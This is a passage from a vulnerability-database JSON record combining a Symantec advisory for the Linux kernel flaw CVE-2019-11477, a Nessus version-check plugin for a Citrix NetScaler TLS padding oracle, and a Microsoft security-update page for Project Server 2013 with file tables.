Enterprise Session Border Controller 7.5.0 \n * Oracle Enterprise Session Border Controller 8.0.0 \n * Oracle Enterprise Session Border Controller 8.1.0 \n * Oracle Enterprise Session Border Controller 8.2.0 \n * Oracle Enterprise Session Border Controller 8.3.0 \n * Pulse Secure Pulse Connect Secure \n * Pulse Secure Pulse Policy Secure \n * Pulse Secure Pulse Secure vADC \n * Redhat CodeReady Linux Builder for ARM 64 8 \n * Redhat CodeReady Linux Builder for Power little endian 8 \n * Redhat CodeReady Linux Builder for x86_64 8 \n * Redhat Enterprise Linux 6 \n * Redhat Enterprise Linux 7 \n * Redhat Enterprise Linux 8 \n * Redhat Enterprise Linux Atomic Host \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop 7 \n * Redhat Enterprise Linux EUS Compute Node 7.4 \n * Redhat Enterprise Linux EUS Compute Node 7.5 \n * Redhat Enterprise Linux EUS Compute Node 7.6 \n * Redhat Enterprise Linux Server (for IBM Power LE) - Update Services for SAP Solutions 7.3 \n * Redhat Enterprise Linux Server (for IBM Power LE) - Update Services for SAP Solutions 7.4 \n * Redhat Enterprise Linux Server (for IBM Power LE) - Update Services for SAP Solutions 7.6 \n * Redhat Enterprise Linux Server - AUS 6.5 \n * Redhat Enterprise Linux Server - AUS 6.6 \n * Redhat Enterprise Linux Server - AUS 7.2 \n * Redhat Enterprise Linux Server - AUS 7.3 \n * Redhat Enterprise Linux Server - AUS 7.4 \n * Redhat Enterprise Linux Server - AUS 7.6 \n * Redhat Enterprise Linux Server - Extended Update Support 7.4 \n * Redhat Enterprise Linux Server - Extended Update Support 7.5 \n * Redhat Enterprise Linux Server - Extended Update Support 7.6 \n * Redhat Enterprise Linux Server - TUS 7.2 \n * Redhat Enterprise Linux Server - TUS 7.3 \n * Redhat Enterprise Linux Server - TUS 7.4 \n * Redhat Enterprise Linux Server - TUS 7.6 \n * Redhat Enterprise Linux Server - Update Services for SAP Solutions 7.2 \n * Redhat Enterprise Linux Server - Update Services for SAP Solutions 7.3 \n * Redhat Enterprise Linux Server - Update Services for SAP Solutions 7.4 \n * Redhat Enterprise Linux Server - Update Services for SAP Solutions 7.6 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server 7 \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation 7 \n * Redhat Enterprise Linux for ARM 64 8 \n * Redhat Enterprise Linux for IBM z Systems - Extended Update Support 7.4 \n * Redhat Enterprise Linux for IBM z Systems - Extended Update Support 7.5 \n * Redhat Enterprise Linux for IBM z Systems - Extended Update Support 7.6 \n * Redhat Enterprise Linux for IBM z Systems 6 \n * Redhat Enterprise Linux for IBM z Systems 7 \n * Redhat Enterprise Linux for IBM z Systems 8 \n * Redhat Enterprise Linux for Power little endian 8 \n * Redhat Enterprise Linux for Power, big endian - Extended Update Support 7.4 \n * Redhat Enterprise Linux for Power, big endian - Extended Update Support 7.5 \n * Redhat Enterprise Linux for Power, big endian - Extended Update Support 7.6 \n * Redhat Enterprise Linux for Power, big endian 6 \n * Redhat Enterprise Linux for Power, big endian 7 \n * Redhat Enterprise Linux for Power, little endian - Extended Update Supp 7.4 \n * Redhat Enterprise Linux for Power, little endian - Extended Update Supp 7.5 \n * Redhat Enterprise Linux for Power, little endian - Extended Update Supp 7.6 \n * Redhat Enterprise Linux for Power, little endian 7 \n * Redhat Enterprise Linux for Real Time 7 \n * Redhat Enterprise Linux for Real Time 8 \n * Redhat Enterprise Linux for Real Time for NFV 7 \n * Redhat Enterprise Linux for Real Time for NFV 8 \n * Redhat Enterprise Linux for Scientific Computing 6 \n * Redhat Enterprise Linux for Scientific Computing 7 \n * Redhat Enterprise Linux for x86_64 8 \n * Redhat Enterprise Mrg 2 \n * Redhat MRG Realtime 2 \n * Redhat OpenShift Container Platform 4.0 \n * Redhat OpenShift Container Platform 4.1 \n * Redhat OpenShift Dedicated \n * Redhat OpenShift Online \n * Redhat Virtualization 4 \n * Redhat Virtualization Host - Extended Update Support 4.2 \n * Redhat Virtualization Host 4 \n * Symantec Advanced Secure Gateway 6.7 \n * Symantec Advanced Secure Gateway 7.1 \n * Symantec Content Analysis 2.3 \n * Symantec Content Analysis 2.4 \n * Symantec Management Center 2.2 \n * Symantec Management Center 2.3 \n * Symantec Reporter 10.3 \n * Symantec Reporter 10.4 \n * Symantec Security Analytics 7.2 \n * Symantec Security Analytics 7.3 \n * Symantec Security Analytics 8.0 \n * Symantec Web Isolation 1.12 \n * VMWare AppDefense \n * VMWare Container Service Extension \n * VMWare Enterprise PKS \n * VMWare Horizon \n * VMWare Horizon DaaS \n * VMWare Hybrid Cloud Extension \n * VMWare Identity Manager \n * VMWare Integrated OpenStack \n * VMWare NSX for vSphere \n * VMWare NSX-T Data Center \n * VMWare Pulse Console \n * VMWare SD-WAN Edge by VeloCloud \n * VMWare SD-WAN Gateway by VeloCloud \n * VMWare SD-WAN Orchestrator by VeloCloud \n * VMWare Skyline Collector \n * VMWare Unified Access Gateway \n * VMWare vCenter Server Appliance 6.0 \n * VMWare vCenter Server Appliance 6.5 \n * VMWare vCenter Server Appliance 6.7 \n * VMWare vCloud Availability Appliance \n * VMWare vCloud Director For Service Providers \n * VMWare vCloud Usage Meter \n * VMWare vRealize Automation \n * VMWare vRealize Business for Cloud \n * VMWare vRealize Code Stream \n * VMWare vRealize Log Insight \n * VMWare vRealize Network Insight \n * VMWare vRealize Operations Manager \n * VMWare vRealize Orchestrator Appliance \n * VMWare vRealize Suite Lifecycle Manager \n * VMWare vSphere Data Protection \n * VMWare vSphere Integrated Containers \n * VMWare vSphere Replication \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the potential damage that successful exploits may achieve, run all nonadministrative software as an unprivileged user.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This may indicate exploit attempts or activity that results from successful exploits.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-06-17T00:00:00", "published": "2019-06-17T00:00:00", "id": "SMNTC-108801", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/108801", "type": "symantec", "title": "Linux Kernel CVE-2019-11477 Integer Overflow Vulnerability", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2021-01-01T01:33:46", "description": "The remote Citrix NetScaler device is affected by a TLS padding oracle\nvulnerability. An attacker may be able to leverage this vulnerability\nto decrypt TLS traffic. Please refer to advisory CTX240139 for more\ninformation.\n\nNote appliances with all CBC-based ciphers disabled are not affected by\nthis vulnerability. Additionally, the following models are not\naffected:\n - MPX 5900 series\n - MPX/SDX 8900 series\n - MPX/SDX 15000-50G\n - MPX/SDX 26000-50S series\n - MPX/SDX 26000-100G series\n - MPX/SDX 26000 series\n - VPX", "edition": 19, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-01-30T00:00:00", "title": "Citrix NetScaler Gateway TLS Padding Oracle Vulnerability (CTX240139)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-6485"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:citrix:netscaler_access_gateway_firmware"], "id": "CITRIX_NETSCALER_CTX240139.NASL", "href": "https://www.tenable.com/plugins/nessus/121472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121472);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/10/31 15:18:51\");\n\n script_cve_id(\"CVE-2019-6485\");\n\n script_name(english:\"Citrix NetScaler Gateway TLS Padding Oracle Vulnerability (CTX240139)\");\n script_summary(english:\"Checks the Citrix NetScaler version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a padding oracle vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Citrix NetScaler device is affected by a TLS padding oracle\nvulnerability. An attacker may be able to leverage this vulnerability\nto decrypt TLS traffic. Please refer to advisory CTX240139 for more\ninformation.\n\nNote appliances with all CBC-based ciphers disabled are not affected by\nthis vulnerability. Additionally, the following models are not\naffected:\n - MPX 5900 series\n - MPX/SDX 8900 series\n - MPX/SDX 15000-50G\n - MPX/SDX 26000-50S series\n - MPX/SDX 26000-100G series\n - MPX/SDX 26000 series\n - VPX\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.citrix.com/article/CTX240139\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Citrix NetScaler Gateway version 10.5 build 69.5 / 11.0\nbuild 72.17 / 11.1 build 60.14 / 12.0 build 60.9 / 12.1 build 50.31\nor later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6485\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:citrix:netscaler_access_gateway_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_netscaler_detect.nbin\");\n script_require_keys(\"Host/NetScaler/Detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Multiple models are not affected and a mitigation strategy is provided\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_name = \"Citrix NetScaler\";\nversion = get_kb_item_or_exit(\"Host/NetScaler/Version\");\nbuild = get_kb_item(\"Host/NetScaler/Build\");\nenhanced = get_kb_item(\"Host/NetScaler/Enhanced\");\nfixed_build = NULL;\n\nif (isnull(build)) exit(0, \"The build number of \" + app_name + \" \" + version + \" could not be determined.\");\n\ndisplay_version = version + \"-\" + build;\nversion = version + \".\" + build;\n\nif (!enhanced)\n{\n # non-enhanced builds\n if (version =~ \"^10\\.5\" && ver_compare(ver:build, fix:\"69.5\") < 0)\n {\n fixed_build = \"69.5\";\n }\n else if (version =~ \"^11\\.0\" && ver_compare(ver:build, fix:\"72.17\") < 0)\n {\n fixed_build = \"72.17\";\n }\n else if (version =~ \"^11\\.1\" && ver_compare(ver:build, fix:\"60.14\") < 0)\n {\n fixed_build = \"60.14\";\n }\n else if (version =~ \"^12\\.0\" && ver_compare(ver:build, fix:\"60.9\") < 0)\n {\n fixed_build = \"60.9\";\n }\n else if (version =~ \"^12\\.1\" && ver_compare(ver:build, fix:\"50.31\") < 0)\n {\n fixed_build = \"50.31\";\n }\n}\n\nif (isnull(fixed_build))\n{\n audit(AUDIT_INST_VER_NOT_VULN, app_name, display_version);\n}\n\nreport =\n '\\n Installed version : ' + display_version +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_WARNING, extra:report, xss: TRUE);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "mskb": [{"lastseen": "2021-01-01T22:47:35", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-8156"], "description": "<html><body><p>Description of the security update for Project Server 2013: May 8, 2018.</p><h2>Summary</h2><div><p>This security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see <a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8156\">Microsoft Common Vulnerabilities and Exposures CVE-2018-8156</a>.<br/><br/><strong>Note</strong> To apply this security update, you must have the release version of <a data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/2880553\" target=\"\">Service Pack 1 for Microsoft Project Server 2013</a> installed on the computer.</p></div><h2>Improvements and fixes</h2><div>This security update contains improvements and fixes for the following nonsecurity issues:<ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><p>After you publish a project plan, you look at the Manage Queue Jobs page and find that the ManagedModeTaskSynchronization job has failed, and you see error details similar to the following:</p><p class=\"indent-1\">GeneralQueueJobFailed (26000) - ManagedModeTaskSynchronization.SynchronizeTaskListInManagedModeMessage.</p></li><li>The title on a Project Detail Page shows the \"&amp;\" (ampersand) character displayed as \"&amp;amp\".</li><li><p>When you try to open a project from the Project Center while using Internet Explorer 11 in Windows 7, you receive the following error message:</p><p class=\"indent-1\">Action Not available. Project Professional needs to be installed to open the project. Install project and try again.</p></li><li><p>Status managers see the following error message in the status updates history page:</p><p class=\"indent-1\">_error loading</p></li><li><p><span><span>Consider the following scenario:</span></span></p><ul><li>As a team member, you open your timesheet and enter work for two adjacent days.</li><li>On the first day, you set the actual work value back to zero.</li><li>On the first day, you set 8 hours of non-working time on an administrator task (for example, vacation)</li><li>You send a status update for approval.</li><li>You open the previous week timesheet.</li><li>You enter actual work values.</li><li>You send the timesheet for approval, and the status manager approves it.</li></ul>In this case, the actual work entered on the second of the two days moves to the first day. The actual work should not move when the status update is applied to the project.</li><li>This update fixes the CRTL+S\u00a0keyboard shortcut save functionality on Project Detail Pages for the Arabic, Finish, and Portuguese versions.</li></ul></div><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faq\" managed-link=\"\" target=\"\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the stand-alone package for this update, go to the <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4022130\" managed-link=\"\" target=\"\">Microsoft Update Catalog</a> website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=3cb0e2f5-0cad-4424-ae5b-c246ba1fbf55\" managed-link=\"\" target=\"\">Download security update KB 4022130 for the 64-bit version of Project Server 2013</a></li></ul><h2>More Information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see <a href=\"https://support.microsoft.com/en-us/help/20180508\">security update deployment information: May 8, 2018</a>.</p><h3>Security update replacement information</h3><p>This security update replaces previously released security update <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4018305\" managed-link=\"\" target=\"\">KB 4018305</a>.</p><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Package name</th><th>Package hash SHA 1</th><th>Package hash SHA 2</th></tr><tr><td>pjsrvloc2013-kb4022130-fullfile-x64-glb.exe</td><td>8F7AF33A42072D250EE57EBA0AE4EE20DC82CC91</td><td>F8DB76AB4B1D148D97018DA8C9744A752A9A5C4D85F7CA39088E43899026DDA7</td></tr></tbody></table><h3><br/>File information</h3><p>The English version of this security update has the file attributes (or later file attributes) that are listed in the following table.\u00a0The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">For all supported x64-based versions of Project Server 2013</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File identifier</th><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th></tr><tr><td>ps16x16.png.1025</td><td>ps16x16.png</td><td>\u00a0</td><td>15916</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1025</td><td>ps32x32.png</td><td>\u00a0</td><td>31412</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1025</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1029</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1029</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1029</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1030</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1030</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1030</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1031</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1031</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1031</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1032</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1032</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1032</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.3082</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.3082</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.3082</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1035</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1035</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1035</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1036</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1036</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1036</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1037</td><td>ps16x16.png</td><td>\u00a0</td><td>15924</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1037</td><td>ps32x32.png</td><td>\u00a0</td><td>31465</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1037</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1038</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1038</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1038</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1040</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1040</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1040</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1041</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1041</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1041</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1042</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1042</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1042</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1044</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1044</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1044</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1043</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1043</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1043</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1045</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1045</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1045</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1046</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1046</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1046</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.2070</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.2070</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.2070</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1048</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1048</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1048</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1049</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1049</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1049</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1051</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1051</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1051</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1060</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1060</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1060</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1053</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1053</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1053</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1055</td><td>ps16x16.png</td><td>\u00a0</td><td>15806</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1055</td><td>ps32x32.png</td><td>\u00a0</td><td>31477</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1055</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1058</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1058</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1058</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.2052</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.2052</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.2052</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps16x16.png.1028</td><td>ps16x16.png</td><td>\u00a0</td><td>15815</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>ps32x32.png.1028</td><td>ps32x32.png</td><td>\u00a0</td><td>31459</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>pwagettingstarted.png.1028</td><td>pwagettingstarted.png</td><td>\u00a0</td><td>8304</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.administration.intl.resources.dll.1025</td><td>microsoft.office.project.server.administration.intl.resources.dll</td><td>15.0.4911.1000</td><td>476920</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>prjsvr.stsadmcommandhandler.intl.resources.dll.1025</td><td>microsoft.office.project.server.stsadmcommandhandler.intl.resources.dll</td><td>15.0.4569.1000</td><td>74432</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>microsoft.office.project.server.workflow.intl.resources.dll.1025</td><td>microsoft.office.project.server.workflow.intl.resources.dll</td><td>15.0.4911.1000</td><td>47352</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>deliverables.xlsx.1025</td><td>deliverables.xlsx</td><td>\u00a0</td><td>12126</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>issuesandrisks.xlsx.1025</td><td>issuesandrisks.xlsx</td><td>\u00a0</td><td>16796</td><td>12-Apr-18</td><td>03:03</td></tr><tr><td>milestonesduethismonth.xlsx.1025</td><td>milestonesduethismonth.xlsx</td><td>\u00a0</td><td>18486</td><td>12-Apr-18</td><td>03:03</td></tr>